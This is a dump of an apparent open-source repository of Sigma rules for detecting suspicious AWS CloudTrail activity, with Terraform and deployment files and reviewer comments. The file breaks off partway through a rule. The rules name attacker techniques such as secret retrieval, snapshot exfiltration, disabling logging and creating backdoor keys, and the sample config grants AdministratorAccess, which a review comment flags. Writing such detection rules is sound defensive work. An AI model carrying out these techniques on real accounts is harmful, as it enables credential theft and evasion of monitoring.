├── images ├── features.png ├── TrailAlerts.png ├── TrailAlerts-Infra.PNG └── TrailAlerts-VPNAPI.PNG ├── rules ├── exceptions.json ├── postprocessing_rules │ └── sample_rules.json └── sigma_rules │ ├── aws_cloudtrail_create_iam.yml │ ├── aws_secretsmanager_getsecrets.yml │ ├── aws_secretsmanager_batchgetsecretvalue.yml │ ├── aws_cloudtrail_attachpolicy.yml │ ├── aws_snapshot_backup_exfiltration.yml │ ├── aws_config_disable_recording.yml │ ├── aws_cloudtrail_new_route_added.yml │ ├── aws_cloudtrail_disable_logging.yml │ ├── aws_delete_identity.yml │ ├── aws_root_account_usage.yml │ ├── aws_disable_bucket_versioning.yml │ ├── aws_guardduty_disruption.yml │ ├── aws_rds_public_db_restore.yml │ ├── aws_efs_fileshare_mount_modified_or_deleted.yml │ ├── aws_cloudtrail_new_acl_entries.yml │ ├── aws_rds_change_master_password.yml │ ├── aws_ec2_deleteflowlogs.yml │ ├── aws_efs_fileshare_modified_or_deleted.yml │ ├── aws_iam_s3browser_user_or_accesskey_creation.yml │ ├── aws_ec2_getpassworddate.yml │ ├── aws_organizations_leaveorganization.yml │ ├── aws_cloudtrail_puteventselectors.yml │ ├── aws_securityhub_finding_evasion.yml │ ├── aws_route53resolver_deleteresolver.yml │ ├── aws_ec2_disable_encryption.yml │ ├── aws_ec2_startup_script_change.yml │ ├── aws_iam_s3browser_loginprofile_creation.yml │ ├── aws_cloudtrail_ssm_malicious_usage.yml │ ├── aws_update_login_profile.yml │ ├── aws_eks_cluster_created_or_deleted.yml │ ├── aws_ssm_ssmgetparameter.yml │ ├── aws_s3_lifecycle.yml │ ├── aws_enum_buckets.yml │ ├── aws_passed_role_to_glue_development_endpoint.yml │ ├── aws_elasticache_security_group_created.yml │ ├── aws_ec2_import_key_pair_activity.yml │ ├── aws_cloudtrail_security_group_change_rds.yml │ ├── aws_rds_dbcluster_actions.yml │ ├── aws_cloudtrail_security_group_change_loadbalancer.yml │ ├── aws_route_53_domain_transferred_to_another_account.yml │ ├── aws_sts_getsessiontoken_misuse.yml │ ├── aws_iam_backdoor_users_keys.yml │ ├── aws_new_lambda_layer_attached.yml │ ├── 
aws_sso_idp_change.yml │ ├── aws_cloudtrail_security_group_change_ingress_egress.yml │ ├── aws_delete_saml_provider.yml │ ├── aws_elasticache_security_group_modified_or_deleted.yml │ ├── aws_susp_saml_activity.yml │ ├── aws_route_53_domain_transferred_lock_disabled.yml │ ├── aws_console_getsignintoken.yml │ ├── aws_lambda_function_url.yml │ ├── aws_s3_data_management_tampering.yml │ ├── aws_update_login_profile_tests.json │ ├── aws_iam_backdoor_users_keys_tests.json │ ├── aws_enum_buckets_tests.json │ ├── aws_cloudtrail_create_iam_tests.json │ ├── aws_delete_identity_tests.json │ ├── aws_ssm_ssmgetparameter_tests.json │ ├── aws_cloudtrail_disable_logging_tests.json │ ├── aws_cloudtrail_new_route_added_tests.json │ ├── aws_ec2_deleteflowlogs_tests.json │ ├── aws_guardduty_disruption_tests.json │ ├── aws_ec2_getpassworddate_tests.json │ ├── aws_rds_dbcluster_actions_tests.json │ ├── aws_sts_getsessiontoken_misuse_tests.json │ ├── aws_cloudtrail_attachpolicy_tests.json │ ├── aws_ec2_import_key_pair_activity_tests.json │ ├── aws_eks_cluster_created_or_deleted_tests.json │ ├── aws_cloudtrail_puteventselectors_tests.json │ ├── aws_s3_data_management_tampering_tests.json │ ├── aws_sso_idp_change_tests.json │ ├── aws_cloudtrail_new_acl_entries_tests.json │ ├── aws_lambda_function_url_tests.json │ ├── aws_secretsmanager_getsecrets_tests.json │ ├── aws_secretsmanager_batchgetsecretvalue_tests.json │ ├── aws_securityhub_finding_evasion_tests.json │ ├── aws_organizations_leaveorganization_tests.json │ ├── aws_passed_role_to_glue_development_endpoint_tests.json │ ├── aws_snapshot_backup_exfiltration_tests.json │ ├── aws_ec2_disable_encryption_tests.json │ ├── aws_efs_fileshare_modified_or_deleted_tests.json │ ├── aws_efs_fileshare_mount_modified_or_deleted_tests.json │ ├── aws_elasticache_security_group_created_tests.json │ ├── aws_cloudtrail_security_group_change_rds_tests.json │ ├── aws_route53resolver_deleteresolver_tests.json │ ├── 
aws_route_53_domain_transferred_lock_disabled_tests.json │ ├── aws_cloudtrail_security_group_change_ingress_egress_tests.json │ ├── aws_elasticache_security_group_modified_or_deleted_tests.json │ ├── aws_root_account_usage_tests.json │ ├── aws_route_53_domain_transferred_to_another_account_tests.json │ ├── aws_cloudtrail_security_group_change_loadbalancer_tests.json │ ├── aws_delete_saml_provider_tests.json │ ├── aws_disable_bucket_versioning_tests.json │ ├── aws_console_getsignintoken_tests.json │ ├── aws_config_disable_recording_tests.json │ ├── aws_ec2_startup_script_change_tests.json │ ├── aws_rds_public_db_restore_tests.json │ ├── aws_s3_lifecycle_tests.json │ ├── aws_cloudtrail_ssm_malicious_usage_tests.json │ ├── aws_rds_change_master_password_tests.json │ └── aws_new_lambda_layer_attached_tests.json ├── terraform ├── terraform.tfvars.json ├── main.tf ├── variables.tf └── migrate.tf ├── utils └── github_oidc.tf ├── .github └── workflows │ └── deploy-rules.yml └── .gitignore /images/features.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/adanalvarez/TrailAlerts/HEAD/images/features.png -------------------------------------------------------------------------------- /images/TrailAlerts.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/adanalvarez/TrailAlerts/HEAD/images/TrailAlerts.png -------------------------------------------------------------------------------- /images/TrailAlerts-Infra.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/adanalvarez/TrailAlerts/HEAD/images/TrailAlerts-Infra.PNG -------------------------------------------------------------------------------- /images/TrailAlerts-VPNAPI.PNG: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/adanalvarez/TrailAlerts/HEAD/images/TrailAlerts-VPNAPI.PNG -------------------------------------------------------------------------------- /rules/exceptions.json: -------------------------------------------------------------------------------- 1 | { 2 | "AWS SecretsManager GetSecretValue":{ 3 | "excludedActors":["arn:aws:iam::123456789012:user/ci-bot","arn:aws:iam::123456789012:role/app-sync"], 4 | "excludedSourceIPs":["10.0.1.100"], 5 | "excludedActorsRegex":[".*AWSReservedSSO_AdministratorAccess.*"] 6 | }, 7 | "AWS Console Login":{ 8 | "excludedActors":["arn:aws:iam::123456789012:user/monitoring"] 9 | } 10 | } -------------------------------------------------------------------------------- /terraform/terraform.tfvars.json: -------------------------------------------------------------------------------- 1 | { 2 | "aws_region": "us-east-1", 3 | "email_endpoint": "mail@mail.com", 4 | "create_cloudtrail": false, 5 | "existing_cloudtrail_bucket_name": "aws-cloudtrail-logs-123123123123-fffffffffff", 6 | "enable_sns": false, 7 | "source_email": "mail@mail.com", 8 | "ses_identities": ["mail@mail.com"], 9 | "correlation_enabled": true, 10 | "environment": "dev", 11 | "cloudwatch_logs_retention_days": 30, 12 | "notification_cooldown_minutes": 5 13 | } -------------------------------------------------------------------------------- /utils/github_oidc.tf: -------------------------------------------------------------------------------- 1 | provider "aws" { 2 | region = "us-east-1" 3 | } 4 | 5 | module "github-oidc" { 6 | source = "github.com/terraform-module/terraform-aws-github-oidc-provider?ref=8ca02cd8c2264d1302cad85683411543d2f01bea" # v2.2.1 7 | 8 | role_name = "TrailAlertsGitHubActionsRole" 9 | create_oidc_provider = true 10 | create_oidc_role = true 11 | 12 | repositories = ["adanalvarez/trailalerts-alpha"] # Change this to your GitHub repository 13 | oidc_role_attach_policies = ["arn:aws:iam::aws:policy/AdministratorAccess"] # Change 
this to the policies you want to attach. NOTE(review): AdministratorAccess is far broader than this role needs; the deploy-rules workflow only runs `aws s3 cp` into the trailalerts-rules-<AWS account id> bucket, so a policy scoped to s3:PutObject on that bucket is the least-privilege choice 14 | } -------------------------------------------------------------------------------- /rules/postprocessing_rules/sample_rules.json: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "type": "correlation", 4 | "sigmaRuleTitle": "AWS CloudTrail Attach Policy", 5 | "lookFor": "AWS CloudTrail IAM User Creation", 6 | "windowMinutes": 15, 7 | "severity_adjustment": "high", 8 | "description": "User creation followed by policy attachment" 9 | }, 10 | { 11 | "type": "threshold", 12 | "sigmaRuleTitle": "AWS SecretsManager GetSecretValue", 13 | "thresholdCount": 10, 14 | "windowMinutes": 5, 15 | "severity_adjustment": "medium", 16 | "description": "Multiple SecretsManager accesses by same actor in short time window" 17 | } 18 | ] -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_create_iam.yml: -------------------------------------------------------------------------------- 1 | title: AWS CloudTrail IAM User Creation 2 | id: 4f60cc0-36fb-42b7-9b58-a5b53019fb74 3 | status: test 4 | description: Detects creation of an IAM user 5 | references: 6 | - https://traildiscover.cloud/#IAM-CreateUser 7 | author: adanalvarez 8 | date: 2025-03-30 9 | modified: 2025-03-30 10 | tags: 11 | - attack.persistence 12 | - attack.t1078 13 | logsource: 14 | product: aws 15 | service: iam 16 | detection: 17 | selection_source: 18 | eventSource: iam.amazonaws.com 19 | eventName: 20 | - CreateUser 21 | condition: selection_source 22 | falsepositives: 23 | - Valid IAM user creation 24 | level: medium -------------------------------------------------------------------------------- /rules/sigma_rules/aws_secretsmanager_getsecrets.yml: -------------------------------------------------------------------------------- 1 | title: AWS SecretsManager GetSecretValue 2 | id: 4a60ff0-36fb-42b7-9b58-a5b53019fb74 3 | status: test 4 | description: Detects 
GetSecretValue in AWS Secrets Manager 5 | references: 6 | - https://traildiscover.cloud/#GetSecretValue 7 | author: adanalvarez 8 | date: 2025-03-30 9 | modified: 2025-03-30 10 | tags: 11 | - attack.credential_access 12 | - attack.t1552 13 | logsource: 14 | product: aws 15 | service: secretsmanager 16 | detection: 17 | selection_source: 18 | eventSource: secretsmanager.amazonaws.com 19 | eventName: 20 | - GetSecretValue 21 | condition: selection_source 22 | falsepositives: 23 | - Valid GetSecretValue 24 | level: low -------------------------------------------------------------------------------- /rules/sigma_rules/aws_secretsmanager_batchgetsecretvalue.yml: -------------------------------------------------------------------------------- 1 | title: AWS SecretsManager GetSecretValue # NOTE(review): this file is a verbatim copy of aws_secretsmanager_getsecrets.yml (same title, same id, same GetSecretValue selection) although its name refers to the BatchGetSecretValue API; two rules sharing one title also makes the title-keyed entries in rules/exceptions.json and sample_rules.json ambiguous, so give this rule its own title and id and select eventName BatchGetSecretValue 2 | id: 4a60ff0-36fb-42b7-9b58-a5b53019fb74 3 | status: test 4 | description: Detects GetSecretValue in AWS Secrets Manager 5 | references: 6 | - https://traildiscover.cloud/#GetSecretValue 7 | author: adanalvarez 8 | date: 2025-03-30 9 | modified: 2025-03-30 10 | tags: 11 | - attack.credential_access 12 | - attack.t1552 13 | logsource: 14 | product: aws 15 | service: secretsmanager 16 | detection: 17 | selection_source: 18 | eventSource: secretsmanager.amazonaws.com 19 | eventName: 20 | - GetSecretValue 21 | condition: selection_source 22 | falsepositives: 23 | - Valid GetSecretValue 24 | level: low -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_attachpolicy.yml: -------------------------------------------------------------------------------- 1 | title: AWS CloudTrail Attach Policy 2 | id: 4f60cc0-36fb-42b7-9b58-a5b53019fb74 # NOTE(review): identical to the id in aws_cloudtrail_create_iam.yml and not a well-formed UUID (first group has 7 hex digits); regenerate a unique id 3 | status: test 4 | description: Detects attaching a policy to an IAM user, group or role 5 | references: 6 | - https://traildiscover.cloud/#IAM-AttachPolicy 7 | author: adanalvarez 8 | date: 2025-03-30 9 | modified: 2025-03-30 10 | tags: 11 | - attack.persistence 12 | - attack.t1078 13 | logsource: 14 | product: 
aws 15 | service: iam 16 | detection: 17 | selection_source: 18 | eventSource: iam.amazonaws.com 19 | eventName: 20 | - AttachUserPolicy 21 | - AttachGroupPolicy 22 | - AttachRolePolicy 23 | condition: selection_source 24 | falsepositives: 25 | - Valid policy attachment to an IAM user, group or role 26 | level: medium -------------------------------------------------------------------------------- /rules/sigma_rules/aws_snapshot_backup_exfiltration.yml: -------------------------------------------------------------------------------- 1 | title: AWS Snapshot Backup Exfiltration 2 | id: abae8fec-57bd-4f87-aff6-6e3db989843d 3 | status: test 4 | description: Detects the modification of an EC2 snapshot's permissions to enable access from another account 5 | references: 6 | - https://www.justice.gov/file/1080281/download 7 | author: Darin Smith 8 | date: 2021-05-17 9 | modified: 2021-08-19 10 | tags: 11 | - attack.exfiltration 12 | - attack.t1537 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection_source: 18 | eventSource: ec2.amazonaws.com 19 | eventName: ModifySnapshotAttribute # NOTE(review): this matches every ModifySnapshotAttribute call, while the description only claims cross-account sharing; narrowing on the createVolumePermission add list in requestParameters would cut noise (confirm the field path against a real event) 20 | condition: selection_source 21 | falsepositives: 22 | - Valid change to a snapshot's permissions 23 | level: medium 24 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_config_disable_recording.yml: -------------------------------------------------------------------------------- 1 | title: AWS Config Disabling Channel/Recorder 2 | id: 07330162-dba1-4746-8121-a9647d49d297 3 | status: test 4 | description: Detects AWS Config Service disabling 5 | references: 6 | - https://docs.aws.amazon.com/config/latest/developerguide/cloudtrail-log-files-for-aws-config.html 7 | author: vitaliy0x1 8 | date: 2020-01-21 9 | modified: 2022-10-09 10 | tags: 11 | - attack.defense-evasion 12 | - attack.t1562.001 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection: 18 | eventSource: 'config.amazonaws.com' 19 | 
eventName: 20 | - 'DeleteDeliveryChannel' 21 | - 'StopConfigurationRecorder' 22 | condition: selection 23 | falsepositives: 24 | - Valid change in AWS Config Service 25 | level: high 26 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_new_route_added.yml: -------------------------------------------------------------------------------- 1 | title: New Network Route Added 2 | id: c803b2ce-c4a2-4836-beae-b112010390b1 3 | status: test 4 | description: | 5 | Detects the addition of a new network route to a route table in AWS. 6 | references: 7 | - https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/ 8 | author: jamesc-grafana 9 | date: 2024-07-11 10 | tags: 11 | - attack.initial-access 12 | - attack.t1190 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection: 18 | eventSource: 'ec2.amazonaws.com' 19 | eventName: 'CreateRoute' 20 | condition: selection 21 | falsepositives: 22 | - New VPC Creation requiring setup of a new route table 23 | - New subnets added requiring routing setup 24 | level: medium 25 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_disable_logging.yml: -------------------------------------------------------------------------------- 1 | title: AWS CloudTrail Important Change 2 | id: 4db60cc0-36fb-42b7-9b58-a5b53019fb74 3 | status: test 4 | description: Detects disabling, deleting and updating of a Trail 5 | references: 6 | - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html 7 | author: vitaliy0x1 8 | date: 2020-01-21 9 | modified: 2022-10-09 10 | tags: 11 | - attack.defense-evasion 12 | - attack.t1562.001 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection_source: 18 | eventSource: cloudtrail.amazonaws.com 19 | eventName: 20 | - StopLogging 21 | - UpdateTrail 22 
| - DeleteTrail 23 | condition: selection_source 24 | falsepositives: 25 | - Valid change in a Trail 26 | level: medium 27 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_delete_identity.yml: -------------------------------------------------------------------------------- 1 | title: SES Identity Has Been Deleted 2 | id: 20f754db-d025-4a8f-9d74-e0037e999a9a 3 | status: test 4 | description: Detects an instance of an SES identity being deleted via the "DeleteIdentity" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities 5 | references: 6 | - https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/ 7 | author: Janantha Marasinghe 8 | date: 2022-12-13 9 | modified: 2022-12-28 10 | tags: 11 | - attack.defense-evasion 12 | - attack.t1070 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection: 18 | eventSource: 'ses.amazonaws.com' 19 | eventName: 'DeleteIdentity' 20 | condition: selection 21 | falsepositives: 22 | - Unknown 23 | level: medium 24 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_root_account_usage.yml: -------------------------------------------------------------------------------- 1 | title: AWS Root Credentials 2 | id: 8ad1600d-e9dc-4251-b0ee-a65268f29add 3 | status: test 4 | description: Detects AWS root account usage 5 | references: 6 | - https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html 7 | author: vitaliy0x1 8 | date: 2020-01-21 9 | modified: 2022-10-09 10 | tags: 11 | - attack.privilege-escalation 12 | - attack.t1078.004 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection_usertype: 18 | userIdentity.type: Root 19 | selection_eventtype: 20 | eventType: AwsServiceEvent 21 | condition: selection_usertype and not selection_eventtype 22 | falsepositives: 23 | - AWS 
Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html 24 | level: medium 25 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_disable_bucket_versioning.yml: -------------------------------------------------------------------------------- 1 | title: AWS S3 Bucket Versioning Disable 2 | id: a136ac98-b2bc-4189-a14d-f0d0388e57a7 3 | status: test 4 | description: Detects when S3 bucket versioning is disabled. Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects. 5 | references: 6 | - https://invictus-ir.medium.com/ransomware-in-the-cloud-7f14805bbe82 7 | author: Sean Johnstone | Unit 42 8 | date: 2023-10-28 9 | tags: 10 | - attack.impact 11 | - attack.t1490 12 | logsource: 13 | product: aws 14 | service: cloudtrail 15 | detection: 16 | selection: 17 | eventSource: s3.amazonaws.com 18 | eventName: PutBucketVersioning 19 | requestParameters|contains: 'Suspended' 20 | condition: selection 21 | falsepositives: 22 | - AWS administrator legitimately disabling bucket versioning 23 | level: medium 24 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_guardduty_disruption.yml: -------------------------------------------------------------------------------- 1 | title: AWS GuardDuty Important Change 2 | id: 6e61ee20-ce00-4f8d-8aee-bedd8216f7e3 3 | status: test 4 | description: Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs. 
5 | references: 6 | - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guardduty__whitelist_ip/main.py#L9 7 | author: faloker 8 | date: 2020-02-11 9 | modified: 2022-10-09 10 | tags: 11 | - attack.defense-evasion 12 | - attack.t1562.001 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection_source: 18 | eventSource: guardduty.amazonaws.com 19 | eventName: CreateIPSet 20 | condition: selection_source 21 | falsepositives: 22 | - Valid change in the GuardDuty (e.g. to ignore internal scanners) 23 | level: high 24 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_rds_public_db_restore.yml: -------------------------------------------------------------------------------- 1 | title: Restore Public AWS RDS Instance 2 | id: c3f265c7-ff03-4056-8ab2-d486227b4599 3 | status: test 4 | description: Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration. 
5 | references: 6 | - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py 7 | author: faloker 8 | date: 2020-02-12 9 | modified: 2022-10-09 10 | tags: 11 | - attack.exfiltration 12 | - attack.t1020 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection_source: 18 | eventSource: rds.amazonaws.com 19 | responseElements.publiclyAccessible: 'true' 20 | eventName: RestoreDBInstanceFromDBSnapshot 21 | condition: selection_source 22 | falsepositives: 23 | - Unknown 24 | level: high 25 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_efs_fileshare_mount_modified_or_deleted.yml: -------------------------------------------------------------------------------- 1 | title: AWS EFS Fileshare Mount Modified or Deleted 2 | id: 6a7ba45c-63d8-473e-9736-2eaabff79964 3 | status: test 4 | description: Detects when a EFS Fileshare Mount is modified or deleted. An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts. 
5 | references: 6 | - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html 7 | author: Austin Songer @austinsonger 8 | date: 2021-08-15 9 | modified: 2022-10-09 10 | tags: 11 | - attack.impact 12 | - attack.t1485 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection: 18 | eventSource: elasticfilesystem.amazonaws.com 19 | eventName: DeleteMountTarget 20 | condition: selection 21 | falsepositives: 22 | - Unknown 23 | level: medium 24 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_new_acl_entries.yml: -------------------------------------------------------------------------------- 1 | title: New Network ACL Entry Added 2 | id: e1f7febb-7b94-4234-b5c6-00fb8500f5dd 3 | status: test 4 | description: | 5 | Detects that network ACL entries have been added to a route table which could indicate that new attack vectors have been opened up in the AWS account. 6 | references: 7 | - https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/ 8 | author: jamesc-grafana 9 | date: 2024-07-11 10 | tags: 11 | - attack.initial-access 12 | - attack.t1190 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection: 18 | eventSource: 'ec2.amazonaws.com' 19 | eventName: 'CreateNetworkAclEntry' 20 | condition: selection 21 | falsepositives: 22 | - Legitimate use of ACLs to enable customer and staff access from the public internet into a public VPC 23 | level: low 24 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_rds_change_master_password.yml: -------------------------------------------------------------------------------- 1 | title: AWS RDS Master Password Change 2 | id: 8a63cdd4-6207-414a-85bc-7e032bd3c1a2 3 | status: test 4 | description: Detects the change of database master password. It may be a part of data exfiltration. 
5 | references: 6 | - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py 7 | author: faloker 8 | date: 2020-02-12 9 | modified: 2022-10-05 10 | tags: 11 | - attack.exfiltration 12 | - attack.t1020 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection_source: 18 | eventSource: rds.amazonaws.com 19 | responseElements.pendingModifiedValues.masterUserPassword|contains: '*' 20 | eventName: ModifyDBInstance 21 | condition: selection_source 22 | falsepositives: 23 | - Benign changes to a db instance 24 | level: medium 25 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_ec2_deleteflowlogs.yml: -------------------------------------------------------------------------------- 1 | title: AWS EC2 DeleteFlowLogs API Call 2 | id: 7b8c9d0e-1f2a-3b4c-5d6e-7f8g9h0i1j2k # NOTE(review): not a UUID (contains the letters g-k); aws_organizations_leaveorganization.yml has the same defect, and Sigma tooling that validates ids may reject both, so regenerate them with a UUID generator. The tags below also use attack.defense_evasion where the other rules in this directory use Sigma's attack.defense-evasion 3 | status: test 4 | description: Detects usage of the DeleteFlowLogs API call, which removes VPC Flow Logs and can hinder network traffic monitoring. 
5 | references: 6 | - https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.vpc-remove-flow-logs/ 7 | - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DeleteFlowLogs.html 8 | author: adanalvarez 9 | date: 2025-04-12 10 | modified: 2025-04-12 11 | tags: 12 | - attack.defense_evasion 13 | - attack.t1562.002 14 | logsource: 15 | product: aws 16 | service: ec2 17 | category: management 18 | detection: 19 | selection: 20 | eventSource: ec2.amazonaws.com 21 | eventName: DeleteFlowLogs 22 | condition: selection 23 | falsepositives: 24 | - Legitimate administrative actions removing obsolete VPC Flow Logs 25 | level: high 26 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_efs_fileshare_modified_or_deleted.yml: -------------------------------------------------------------------------------- 1 | title: AWS EFS Fileshare Modified or Deleted 2 | id: 25cb1ba1-8a19-4a23-a198-d252664c8cef 3 | status: test 4 | description: | 5 | Detects when a EFS Fileshare is modified or deleted. 6 | You can't delete a file system that is in use. 7 | If the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare. 
8 | references: 9 | - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html 10 | author: Austin Songer @austinsonger 11 | date: 2021-08-15 12 | modified: 2022-10-09 13 | tags: 14 | - attack.impact 15 | logsource: 16 | product: aws 17 | service: cloudtrail 18 | detection: 19 | selection: 20 | eventSource: elasticfilesystem.amazonaws.com 21 | eventName: DeleteFileSystem 22 | condition: selection 23 | falsepositives: 24 | - Unknown 25 | level: medium 26 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_iam_s3browser_user_or_accesskey_creation.yml: -------------------------------------------------------------------------------- 1 | title: AWS IAM S3Browser User or AccessKey Creation 2 | id: db014773-d9d9-4792-91e5-133337c0ffee 3 | status: test 4 | description: Detects S3 Browser utility creating IAM User or AccessKey. 5 | references: 6 | - https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor 7 | author: daniel.bohannon@permiso.io (@danielhbohannon) 8 | date: 2023-05-17 9 | tags: 10 | - attack.execution 11 | - attack.persistence 12 | - attack.t1059.009 13 | - attack.t1078.004 14 | logsource: 15 | product: aws 16 | service: cloudtrail 17 | detection: 18 | selection: 19 | eventSource: 'iam.amazonaws.com' 20 | eventName: 21 | - 'CreateUser' 22 | - 'CreateAccessKey' 23 | userAgent|contains: 'S3 Browser' 24 | condition: selection 25 | falsepositives: 26 | - Valid usage of S3 Browser for IAM User and/or AccessKey creation 27 | level: high 28 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_ec2_getpassworddate.yml: -------------------------------------------------------------------------------- 1 | title: AWS EC2 GetPasswordData API Call 2 | id: 1a2b3c4d-5e6f-7a8b-9c0d-1e2f3a4b5c6d 3 | status: test 4 | description: Detects usage of the GetPasswordData API call, which retrieves the encrypted administrator password for a Windows EC2 
instance. 5 | references: 6 | - https://stratus-red-team.cloud/attack-techniques/AWS/aws.credential-access.ec2-get-password-data/ 7 | - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_GetPasswordData.html 8 | - https://traildiscover.cloud/#EC2-GetPasswordData 9 | author: adanalvarez 10 | date: 2025-04-12 11 | modified: 2025-04-12 12 | tags: 13 | - attack.credential_access 14 | - attack.t1552 15 | logsource: 16 | product: aws 17 | service: ec2 18 | detection: 19 | selection: 20 | eventSource: ec2.amazonaws.com 21 | eventName: GetPasswordData 22 | condition: selection 23 | falsepositives: 24 | - Legitimate administrative actions retrieving Windows EC2 instance passwords 25 | level: medium 26 | -------------------------------------------------------------------------------- /.github/workflows/deploy-rules.yml: -------------------------------------------------------------------------------- 1 | name: Deploy new rules to TrailAlerts S3 2 | 3 | 4 | on: 5 | push: 6 | branches: [ main ] 7 | paths: 8 | - 'rules/**' 9 | workflow_dispatch: 10 | 11 | permissions: 12 | id-token: write 13 | contents: read 14 | 15 | jobs: 16 | deploy-rules: 17 | runs-on: ubuntu-latest 18 | 19 | env: 20 | AWS_ACCOUNT_ID: ${{ secrets.AWS_ACCOUNT_ID }} 21 | 22 | steps: 23 | - uses: actions/checkout@v4 # NOTE(review): this and configure-aws-credentials@v4 are pinned to mutable tags; pinning to a full commit SHA (version in a trailing comment) matches how utils/github_oidc.tf pins its Terraform module and removes the tag-retargeting risk 24 | 25 | - name: Login to AWS 26 | uses: aws-actions/configure-aws-credentials@v4 27 | with: 28 | aws-region: us-east-1 29 | role-to-assume: arn:aws:iam::${{ env.AWS_ACCOUNT_ID }}:role/TrailAlertsGitHubActionsRole 30 | role-session-name: TrailAlertsGitHubActionsSession 31 | role-duration-seconds: 900 32 | 33 | - name: Upload rules to S3 # NOTE(review): nothing checks the rule files before upload, so a malformed YAML/JSON rule pushed to main lands in the bucket as-is; a validation step that parses every file under rules/ before this copy would catch that 34 | run: | 35 | aws s3 cp rules/ s3://trailalerts-rules-${{ env.AWS_ACCOUNT_ID }}/ --recursive 36 | echo "Rules uploaded to S3 bucket." 
-------------------------------------------------------------------------------- /rules/sigma_rules/aws_organizations_leaveorganization.yml: -------------------------------------------------------------------------------- 1 | title: AWS Organizations LeaveOrganization API Call 2 | id: 6a7b8c9d-0e1f-2a3b-4c5d-6e7f8g9h0i1j 3 | status: test 4 | description: Detects usage of the LeaveOrganization API call, which removes a member account from its parent AWS Organization. 5 | references: 6 | - https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.organizations-leave/ 7 | - https://docs.aws.amazon.com/organizations/latest/APIReference/API_LeaveOrganization.html 8 | author: adanalvarez 9 | date: 2025-04-12 10 | modified: 2025-04-12 11 | tags: 12 | - attack.defense_evasion 13 | - attack.t1562.001 14 | logsource: 15 | product: aws 16 | service: organizations 17 | category: management 18 | detection: 19 | selection: 20 | eventSource: organizations.amazonaws.com 21 | eventName: LeaveOrganization 22 | condition: selection 23 | falsepositives: 24 | - Legitimate administrative actions removing an account from an organization 25 | level: high 26 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_puteventselectors.yml: -------------------------------------------------------------------------------- 1 | title: AWS CloudTrail PutEventSelectors with includeManagementEvents Disabled 2 | id: e7f3c2d1-4b5a-6c7d-8e9f-0a1b2c3d4e5f 3 | status: test 4 | description: Detects usage of the PutEventSelectors API call with includeManagementEvents set to false, which disables logging of management events in AWS CloudTrail. 
